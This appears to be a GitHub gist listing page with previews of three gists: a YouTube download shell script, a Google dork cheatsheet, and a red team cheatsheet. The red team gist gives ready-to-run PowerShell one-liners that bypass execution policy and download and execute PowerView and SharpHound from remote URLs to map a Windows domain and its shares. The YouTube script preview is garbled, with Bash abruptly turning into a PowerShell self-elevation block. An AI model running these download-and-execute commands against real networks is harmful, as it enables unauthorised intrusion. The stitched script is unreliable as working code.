Skip to content

Instantly share code, notes, and snippets.

@Jonesckevin
Jonesckevin / YouTubeDownload.sh
Created December 19, 2024 07:48
Shell Script to Install, and download YouTube Video from their URL
#!/bin/bash
remove_youtube_dl() {
# Uninstall all youtube-dl versions
apt-get remove youtube-dl
}
install_or_update_yt_dlp() {
# Check if Python3 is installed
if ! command -v python3 &> /dev/null
# Check if running with administrative privileges
$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
if (-not $isAdmin) {
$psi = New-Object System.Diagnostics.ProcessStartInfo
$psi.FileName = 'powershell'
$psi.Arguments = "-Command Start-Process -Verb RunAs -FilePath $PSCommandPath"
$psi.Verb = 'runas'
[System.Diagnostics.Process]::Start($psi) | Out-Null
Exit
@Jonesckevin
Jonesckevin / GoogleDorking.md
Created August 23, 2023 18:03 — forked from sundowndev/GoogleDorking.md
Google dork cheatsheet

Google dork cheatsheet

Search filters

Filter Description Example
allintext Searches for occurrences of all the keywords given. allintext:"keyword"
intext Searches for the occurrences of keywords all at once or one at a time. intext:"keyword"
inurl Searches for a URL matching one of the keywords. inurl:"keyword"
allinurl Searches for a URL matching all the keywords in the query. allinurl:"keyword"
intitle Searches for occurrences of keywords in title all or one. intitle:"keyword"
@Jonesckevin
Jonesckevin / RedTeam_CheatSheet.ps1
Created October 25, 2021 16:13 — forked from m8sec/RedTeam_CheatSheet.ps1
Red Team CheatSheet
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"